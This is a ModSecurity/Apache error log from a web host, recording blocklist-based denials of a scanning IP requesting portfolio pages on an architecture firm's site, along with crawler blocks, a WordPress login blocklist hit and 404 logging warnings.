[Tue May 26 13:39:55.791701 2026] [security2:error] [pid 544395:tid 544583] [client 65.21.124.77:34680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2025b-EzhamSuvai_Kattur.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL5QAAADo"]
[Tue May 26 13:39:55.811314 2026] [security2:error] [pid 544395:tid 544616] [client 65.21.124.77:34772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2025b-EzhamSuvai_Kattur.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL5gAAAFs"]
[Tue May 26 13:39:55.984325 2026] [security2:error] [pid 536875:tid 537103] [client 65.21.124.77:35044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2024b-VijaySheaker.php"] [unique_id "ahVVU-r_-FTveSGlx1HslgAAAOc"]
[Tue May 26 13:39:55.984378 2026] [security2:error] [pid 536875:tid 537023] [client 65.21.124.77:35048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2023a-DrMansoor.php"] [unique_id "ahVVU-r_-FTveSGlx1HslwAAAJc"]
[Tue May 26 13:39:55.985454 2026] [security2:error] [pid 544395:tid 544621] [client 65.21.124.77:34986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2022a-Jeyaselan.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL6wAAAGA"]
[Tue May 26 13:39:55.985600 2026] [security2:error] [pid 544395:tid 544536] [client 65.21.124.77:35046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-services-architecture.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL7AAAAAs"]
[Tue May 26 13:39:55.985867 2026] [security2:error] [pid 536875:tid 537057] [client 65.21.124.77:35016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2024a-DivyaSampath.php"] [unique_id "ahVVU-r_-FTveSGlx1HsmAAAALk"]
[Tue May 26 13:39:55.985929 2026] [security2:error] [pid 536875:tid 537018] [client 65.21.124.77:35050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2022d-Sundar.php"] [unique_id "ahVVU-r_-FTveSGlx1HsmgAAAJI"]
[Tue May 26 13:39:55.986034 2026] [security2:error] [pid 536875:tid 537030] [client 65.21.124.77:35002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2022c-ShanmugaRajasheaker.php"] [unique_id "ahVVU-r_-FTveSGlx1HsmQAAAJ4"]
[Tue May 26 13:39:55.986665 2026] [security2:error] [pid 544395:tid 544571] [client 65.21.124.77:35014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2023b-Nirapirigai.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL7QAAAC4"]
[Tue May 26 13:39:56.010399 2026] [security2:error] [pid 544395:tid 544563] [client 65.21.124.77:35126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-website-privacy.php"] [unique_id "ahVVVBmrs7g3RMCdp8XL7gAAACY"]
[Tue May 26 13:39:56.152588 2026] [security2:error] [pid 544395:tid 544639] [client 65.21.124.77:35028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2020b-AkshobhyaHomes.php"] [unique_id "ahVVVBmrs7g3RMCdp8XL8wAAAHI"]
[Tue May 26 13:39:56.153763 2026] [security2:error] [pid 544395:tid 544609] [client 65.21.124.77:35058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2022e-Vijay.php"] [unique_id "ahVVVBmrs7g3RMCdp8XL9AAAAFQ"]
[Tue May 26 13:39:56.399525 2026] [security2:error] [pid 544395:tid 544630] [client 65.21.124.77:35226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2020c-DrJustin.php"] [unique_id "ahVVVBmrs7g3RMCdp8XL9QAAAGk"]
[Tue May 26 13:39:56.399532 2026] [security2:error] [pid 536875:tid 537078] [client 65.21.124.77:35216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2015a-AiravataKandy.php"] [unique_id "ahVVVOr_-FTveSGlx1HsnAAAAM4"]
[Tue May 26 13:39:56.399592 2026] [security2:error] [pid 544395:tid 544578] [client 65.21.124.77:35238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2012b-SasthaSagar.php"] [unique_id "ahVVVBmrs7g3RMCdp8XL9gAAADU"]
[Tue May 26 13:39:56.399704 2026] [security2:error] [pid 544395:tid 544618] [client 65.21.124.77:35202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2019a-EzhamSuvai_TVKovil.php"] [unique_id "ahVVVBmrs7g3RMCdp8XL9wAAAF0"]
[Tue May 26 13:39:56.399859 2026] [security2:error] [pid 536875:tid 537059] [client 65.21.124.77:35170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2013c-EzhamSuvai_TNagar.php"] [unique_id "ahVVVOr_-FTveSGlx1HsnQAAALs"]
[Tue May 26 13:39:56.400125 2026] [security2:error] [pid 544395:tid 544579] [client 65.21.124.77:35204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2015b-ChettinadResturantTirupur.php"] [unique_id "ahVVVBmrs7g3RMCdp8XL-AAAADY"]
[Tue May 26 13:39:56.400301 2026] [security2:error] [pid 536875:tid 537036] [client 65.21.124.77:35168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2020a-Abhirami.php"] [unique_id "ahVVVOr_-FTveSGlx1HsngAAAKQ"]
[Tue May 26 13:39:56.400783 2026] [security2:error] [pid 536875:tid 537046] [client 65.21.124.77:35198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2019c-ShreenayaasBoutique.php"] [unique_id "ahVVVOr_-FTveSGlx1HsnwAAAK4"]
[Tue May 26 13:39:56.530756 2026] [security2:error] [pid 544395:tid 544652] [client 65.21.124.77:35262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2024a-DivyaSampath.php"] [unique_id "ahVVVBmrs7g3RMCdp8XL_gAAAH8"]
[Tue May 26 13:39:56.530788 2026] [security2:error] [pid 536875:tid 537017] [client 65.21.124.77:35270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-aboutus.php"] [unique_id "ahVVVOr_-FTveSGlx1HsqgAAAJE"]
[Tue May 26 13:39:56.530835 2026] [security2:error] [pid 544395:tid 544553] [client 65.21.124.77:35318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2023b-Nirapirigai.php"] [unique_id "ahVVVBmrs7g3RMCdp8XL_wAAABw"]
[Tue May 26 13:39:56.530861 2026] [security2:error] [pid 536875:tid 537127] [client 65.21.124.77:35354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2024b-VijaySheaker.php"] [unique_id "ahVVVOr_-FTveSGlx1HsqQAAAP8"]
[Tue May 26 13:39:56.530888 2026] [security2:error] [pid 536875:tid 537008] [client 65.21.124.77:35256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2026a-CholaBoardRoom.php"] [unique_id "ahVVVOr_-FTveSGlx1HspwAAAIg"]
[Tue May 26 13:39:56.531010 2026] [security2:error] [pid 536875:tid 537040] [client 65.21.124.77:35250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2025a-KaizenServApt.php"] [unique_id "ahVVVOr_-FTveSGlx1HspgAAAKg"]
[Tue May 26 13:39:56.531127 2026] [security2:error] [pid 536875:tid 537093] [client 65.21.124.77:35284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-quote.php"] [unique_id "ahVVVOr_-FTveSGlx1HsqAAAAN0"]
[Tue May 26 13:39:56.531841 2026] [security2:error] [pid 544395:tid 544633] [client 65.21.124.77:35360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2023a-DrMansoor.php"] [unique_id "ahVVVBmrs7g3RMCdp8XMAAAAAGw"]
[Tue May 26 13:39:56.568496 2026] [security2:error] [pid 544395:tid 544606] [client 65.21.124.77:35188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2013a-Anand.php"] [unique_id "ahVVVBmrs7g3RMCdp8XMAwAAAFE"]
[Tue May 26 13:39:56.701824 2026] [security2:error] [pid 544395:tid 544568] [client 65.21.124.77:35392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2022e-Vijay.php"] [unique_id "ahVVVBmrs7g3RMCdp8XMBQAAACs"]
[Tue May 26 13:39:56.702404 2026] [security2:error] [pid 544395:tid 544644] [client 65.21.124.77:35332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2021a-DrPunithaRajesh.php"] [unique_id "ahVVVBmrs7g3RMCdp8XMBgAAAHc"]
[Tue May 26 13:39:56.708913 2026] [security2:error] [pid 536875:tid 537041] [client 65.21.124.77:35510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2021a-DrPunithaRajesh.php"] [unique_id "ahVVVOr_-FTveSGlx1HsrQAAAKk"]
[Tue May 26 13:39:56.711062 2026] [security2:error] [pid 536875:tid 537037] [client 65.21.124.77:35504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2012a-EzhamSuvai_Cantonment.php"] [unique_id "ahVVVOr_-FTveSGlx1HsrgAAAKU"]
[Tue May 26 13:39:56.933074 2026] [security2:error] [pid 536875:tid 537024] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVVOr_-FTveSGlx1HsogAAAJg"]
[Tue May 26 13:39:57.253936 2026] [security2:error] [pid 544395:tid 544591] [client 65.21.124.77:35672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2022a-Jeyaselan.php"] [unique_id "ahVVVRmrs7g3RMCdp8XMEAAAAEI"]
[Tue May 26 13:39:57.253950 2026] [security2:error] [pid 536875:tid 537043] [client 65.21.124.77:35724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2022c-ShanmugaRajasheaker.php"] [unique_id "ahVVVer_-FTveSGlx1HsswAAAKs"]
[Tue May 26 13:39:57.254107 2026] [security2:error] [pid 536875:tid 537118] [client 65.21.124.77:35622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2020c-DrJustin.php"] [unique_id "ahVVVer_-FTveSGlx1HstAAAAPY"]
[Tue May 26 13:39:57.254237 2026] [security2:error] [pid 544395:tid 544583] [client 65.21.124.77:35702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2019a-EzhamSuvai_TVKovil.php"] [unique_id "ahVVVRmrs7g3RMCdp8XMEQAAADo"]
[Tue May 26 13:39:57.254683 2026] [security2:error] [pid 536875:tid 537045] [client 65.21.124.77:35664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2019c-ShreenayaasBoutique.php"] [unique_id "ahVVVer_-FTveSGlx1HstQAAAK0"]
[Tue May 26 13:39:57.254877 2026] [security2:error] [pid 536875:tid 537035] [client 65.21.124.77:35632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2022d-Sundar.php"] [unique_id "ahVVVer_-FTveSGlx1HstwAAAKM"]
[Tue May 26 13:39:57.255020 2026] [security2:error] [pid 536875:tid 537110] [client 65.21.124.77:35648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2020b-AkshobhyaHomes.php"] [unique_id "ahVVVer_-FTveSGlx1HstgAAAO4"]
[Tue May 26 13:39:57.255021 2026] [security2:error] [pid 536875:tid 537021] [client 65.21.124.77:35678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2020a-Abhirami.php"] [unique_id "ahVVVer_-FTveSGlx1HsuAAAAJU"]
[Tue May 26 13:39:57.332507 2026] [fcgid:warn] [pid 536875:tid 537086] (70014)End of file found: [client 66.132.172.140:63292] mod_fcgid: can't get data from http client
[Tue May 26 13:39:57.422521 2026] [security2:error] [pid 536875:tid 537066] [client 65.21.124.77:35700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2015b-ChettinadResturantTirupur.php"] [unique_id "ahVVVer_-FTveSGlx1HsugAAAMI"]
[Tue May 26 13:39:57.422670 2026] [security2:error] [pid 536875:tid 537053] [client 65.21.124.77:35636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2015a-AiravataKandy.php"] [unique_id "ahVVVer_-FTveSGlx1HsuwAAALU"]
[Tue May 26 13:39:57.831260 2026] [security2:error] [pid 544395:tid 544563] [client 65.21.124.77:20880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2013c-EzhamSuvai_TNagar.php"] [unique_id "ahVVVRmrs7g3RMCdp8XMFgAAACY"]
[Tue May 26 13:39:57.831381 2026] [security2:error] [pid 536875:tid 537022] [client 65.21.124.77:20940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2012a-EzhamSuvai_Cantonment.php"] [unique_id "ahVVVer_-FTveSGlx1HsxQAAAJY"]
[Tue May 26 13:39:57.831890 2026] [security2:error] [pid 536875:tid 537115] [client 65.21.124.77:20896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2013a-Anand.php"] [unique_id "ahVVVer_-FTveSGlx1HsxgAAAPM"]
[Tue May 26 13:39:57.832485 2026] [security2:error] [pid 536875:tid 537055] [client 65.21.124.77:20918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2012b-SasthaSagar.php"] [unique_id "ahVVVer_-FTveSGlx1HsxwAAALc"]
[Tue May 26 13:39:58.016118 2026] [security2:error] [pid 536875:tid 536975] [remote 84.247.129.9:50074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVVVer_-FTveSGlx1HsxAAAxGM"]
[Tue May 26 13:39:59.576173 2026] [security2:error] [pid 536875:tid 537049] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVV-r_-FTveSGlx1Hs3AAAALE"]
[Tue May 26 13:40:00.420071 2026] [security2:error] [pid 544395:tid 544572] [client 114.119.149.90:24959] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ameritradeng.com"] [uri "/"] [unique_id "ahVVWBmrs7g3RMCdp8XMRwAAAC8"], referer: https://ameritradeng.com/
[Tue May 26 13:40:00.521201 2026] [security2:error] [pid 544395:tid 544599] [client 47.128.124.42:13104] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.acdealernoida.in"] [uri "/blog/"] [unique_id "ahVVWBmrs7g3RMCdp8XMTAAAAEo"]
[Tue May 26 13:40:00.797892 2026] [security2:error] [pid 544395:tid 544615] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVWBmrs7g3RMCdp8XMRgAAAFo"]
[Tue May 26 13:40:02.854086 2026] [security2:error] [pid 544395:tid 544596] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVWhmrs7g3RMCdp8XMgAAAAEc"]
